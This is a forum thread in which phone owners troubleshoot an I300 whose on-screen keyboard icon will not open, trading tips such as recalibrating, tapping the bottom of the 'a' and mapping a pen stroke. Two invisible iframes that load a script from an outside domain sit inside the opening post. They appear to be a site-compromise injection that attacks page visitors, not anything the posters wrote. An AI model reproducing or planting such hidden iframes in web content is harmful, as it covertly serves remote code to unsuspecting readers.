+ Reply to Thread

One Small Problem

Hi Everyone!

I just got my new I300, and I found one problem with the way it works. I was wondering if anyone else is having similar problems.

On the scribble screen, there are two icons... one to open the keyboard, and one to open the number pad. The number pad icon works, but the keyboard icon doesn't. It is not a real big problem... I can open the number pad and switch over, but I feel it should work.

Should I suck it up and not worry about it, or try to get it fixed/replaced.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

did you try recalibrating? maybe its off slightly, not allowing you to tap on that small spot....

Brooks

i have the same problem
    Marc-André Pïlon

Interesting...

Thanks!

Anyone know how to recalibrate the unit? I tried to find it in the manual, but couldn't find it.

Thanks!

Russ

does not change anything to re-calibrate
    Marc-André Pïlon

Preferences - Digitizer...

you have to have the phone off to calibrate...

Brooks

Yep... I tried it to.... but no luck.

Thanks for trying!

i have the same problem too, must be a common bug. to call up the alphanumeric keyboard, instead of tapping the "a", tap below it, right at the edge of the screen. it should now work.

I tried your suggestion...

I tried and tried to find any part of the "a" to get the keyboard to pop up, but no luck... so I set a button preference to open the keyboard on a certain pen stroke. When I draw a line from the scribble pad to the icon list it will open the keyboard. This seems to work well for me.

I just figured this may help someone else. Good luck!

Talking Mine works.

I was able to bring up the keyboard by tapping the "a". You have to tap the very bottom of the "a" to get the keyboard.

I was able to bring up the keyboard by tapping the "a" too. As stated, you have to tap the very, very bottom of the "a" to get the keyboard...

I can tap any part of the a and not be carefull and it comes up. Could a hack or something be messing up some folks? I have no hacks.

Can the people who have the problem do a hard reset and try it before loading any apps?

Administrator

Arrow

russ, ab,

tap the a with a little force... i just did it and it seemd it was not working for me.. but i tapped it again with a slight more pressure and it came on fine! i dont think anything it wrong with the unit.. just give it a little more "push"...

Lightbulb Keyboard icon solution!!!

I think I have figured out the problem. First tap your pen on any field in the datebook. Then click the "a". I think that this should solve the problem. The software is configured for you to select a record or open time before the keyboard will come up.

Keyboard problem

I don't think that will work. It is a bug that apparently affects all the phones -- you certainly need to be at a place where you can call the keyboard up, but that's an independent issue. I hope this problem will be fixed in future versions. One temporary solution is to go to "preferences" "buttons" and you can make the keyboard pop up by dragging your stylus up the screen.

Administrator

Arrow

when the graffiti screen is up and i need to use the virtual keyboard by tapping the "a", its pops right up! i dont see this "bug" some of you refer to...

Is there a numbness problem with some units? There are places on the screen where ti stylus does not register. Does anyone else have this problem?